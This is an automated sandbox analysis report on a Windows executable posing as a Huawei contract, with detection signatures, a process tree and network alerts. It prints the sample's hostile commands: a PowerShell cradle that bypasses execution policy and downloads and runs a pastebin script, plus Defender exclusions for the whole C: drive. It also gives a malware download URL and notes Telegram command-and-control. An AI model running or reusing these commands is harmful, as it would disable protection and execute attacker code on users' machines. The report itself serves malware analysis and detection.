Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
[Huawei] Contract for YouTube partners.exe

Overview

General Information

Sample name:[Huawei] Contract for YouTube partners.exe
Analysis ID:1617339
MD5:dd0b202977b83e0c52c2537616c7a620
SHA1:2222a2298b601ba778f6b15e6ed93116de5e2662
SHA256:86cea9c754cf8904e57e345cd6e1af7023c60590c5407a92492a7cf5017c89b7
Tags:exeWHKzW2nruser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • [Huawei] Contract for YouTube partners.exe (PID: 2356 cmdline: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe" MD5: DD0B202977B83E0C52C2537616C7A620)
    • powershell.exe (PID: 5980 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 876 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 5728 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 1080 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD333.tmp" "c:\Users\user\AppData\Local\Temp\jwryu2yd\CSC4A1A778723A0488D9C81AB4CE7B7E2B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 5704 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: PowerShell Download and Execution Cradles
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe", ParentImage: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe, ParentProcessId: 2356, ParentProcessName: [Huawei] Contract for YouTube partners.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 876, ProcessName: powershell.exe
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe", ParentImage: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe, ParentProcessId: 2356, ParentProcessName: [Huawei] Contract for YouTube partners.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 5980, ProcessName: powershell.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe", ParentImage: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe, ParentProcessId: 2356, ParentProcessName: [Huawei] Contract for YouTube partners.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 876, ProcessName: powershell.exe
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline", ProcessId: 5728, ProcessName: csc.exe
Sigma detected: PowerShell Web Download
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe", ParentImage: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe, ParentProcessId: 2356, ParentProcessName: [Huawei] Contract for YouTube partners.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 876, ProcessName: powershell.exe
Sigma detected: Powershell Defender Exclusion
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe", ParentImage: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe, ParentProcessId: 2356, ParentProcessName: [Huawei] Contract for YouTube partners.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 5980, ProcessName: powershell.exe
Sigma detected: Usage Of Web Request Commands And Cmdlets
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe", ParentImage: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe, ParentProcessId: 2356, ParentProcessName: [Huawei] Contract for YouTube partners.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 876, ProcessName: powershell.exe
Sigma detected: Dynamic CSharp Compile Artefact
Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 876, TargetFilename: C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe", ParentImage: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe, ParentProcessId: 2356, ParentProcessName: [Huawei] Contract for YouTube partners.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 5980, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 876, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline", ProcessId: 5728, ProcessName: csc.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-17T19:35:40.469309+010028033053Unknown Traffic192.168.2.649778104.26.12.20580TCP
2025-02-17T19:35:40.970979+010028033053Unknown Traffic192.168.2.649785208.95.112.180TCP
2025-02-17T19:36:07.249077+010028033053Unknown Traffic192.168.2.64982589.23.97.21480TCP
2025-02-17T19:36:07.262561+010028033053Unknown Traffic192.168.2.64982489.23.97.21480TCP
2025-02-17T19:36:28.657629+010028033053Unknown Traffic192.168.2.64996189.23.97.21480TCP
2025-02-17T19:36:28.659655+010028033053Unknown Traffic192.168.2.64996089.23.97.21480TCP
2025-02-17T19:36:50.028855+010028033053Unknown Traffic192.168.2.64999589.23.97.21480TCP
2025-02-17T19:36:50.030883+010028033053Unknown Traffic192.168.2.64999489.23.97.21480TCP
2025-02-17T19:37:11.386733+010028033053Unknown Traffic192.168.2.64999889.23.97.21480TCP
2025-02-17T19:37:11.402768+010028033053Unknown Traffic192.168.2.64999989.23.97.21480TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-17T19:37:12.000976+010018100071Potentially Bad Traffic192.168.2.650001149.154.167.220443TCP
2025-02-17T19:37:12.044300+010018100071Potentially Bad Traffic192.168.2.650002149.154.167.220443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-17T19:35:42.078768+010018100091Potentially Bad Traffic192.168.2.649792149.154.167.220443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-17T19:35:26.525126+010018100002Potentially Bad Traffic192.168.2.649706172.67.19.24443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: http://89.23.97.214/Team/32cv.exeAvira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: [Huawei] Contract for YouTube partners.exeReversingLabs: Detection: 24%
Source: [Huawei] Contract for YouTube partners.exeVirustotal: Detection: 11%Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
Source: unknownHTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.6:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49792 version: TLS 1.2
Source: [Huawei] Contract for YouTube partners.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250591766.000002B7E9D51000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250619026.000002B7E9D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248897242.000002B7E9280000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248955580.000002B7E92C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Xml\Release\net8.0-windows\System.Private.Xml.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249795196.000002B7E9680000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9981000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253245076.000002B7EB261000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253056950.000002B7EB090000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245966712.00000277513E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246764040.000002B7E5F40000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244830292.000002774F971000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249770533.000002B7E9660000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248833493.000002B7E91C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248750883.000002B7E9100000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256H source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net8.0-windows\System.Net.Quic.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251604593.000002B7EA231000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251630855.000002B7EA250000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251410435.000002B7EA1B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251433635.000002B7EA1C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248611872.000002B7E90A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248658900.000002B7E90C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249010025.000002B7E9301000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249032962.000002B7E9310000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249620096.000002B7E95D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249669770.000002B7E9601000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Linq.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249620096.000002B7E95D0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249669770.000002B7E9601000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Tracing\Release\net8.0\System.Diagnostics.Tracing.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248252782.000002B7E8F30000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246966709.000002B7E60C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.ComponentModel.EventBasedAsync.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251136685.000002B7E9FB0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251111684.000002B7E9FA1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.DataContractSerialization.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249216693.000002B7E9390000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249306930.000002B7E9471000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249143432.000002B7E9341000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249169651.000002B7E9360000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.CoreLib.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247422973.000002B7E6661000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3247040069.000002B7E60D0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250716435.000002B7E9DC1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250642336.000002B7E9D70000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Loader\Release\net8.0\System.Runtime.Loader.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249503089.000002B7E9590000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249428276.000002B7E9571000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Uri\Release\net8.0\System.Private.Uri.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248471233.000002B7E8FD0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248337268.000002B7E8F51000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Primitives\Release\net8.0-windows\System.Net.Primitives.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248225564.000002B7E8F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248179022.000002B7E8EF0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Private.Xml.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249795196.000002B7E9680000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9981000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Collections.Specialized.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250803085.000002B7E9E20000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250777948.000002B7E9E11000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249194705.000002B7E9380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248294715.000002B7E8F41000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net8.0-windows\System.Net.Quic.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251604593.000002B7EA231000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251630855.000002B7EA250000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Reflection.Emit.ILGeneration\Release\net8.0\System.Reflection.Emit.ILGeneration.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249567499.000002B7E95B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249594148.000002B7E95C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249474322.000002B7E9581000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249525013.000002B7E95A0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading\Release\net8.0\System.Threading.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246009062.00000277513F1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246783735.000002B7E5F50000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250591766.000002B7E9D51000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250619026.000002B7E9D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Claims.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245831020.00000277513A1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245856993.00000277513B0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Text.RegularExpressions.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250422129.000002B7E9C80000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250523289.000002B7E9CE1000.00000020.00001000.00020000.00000000.sdmp
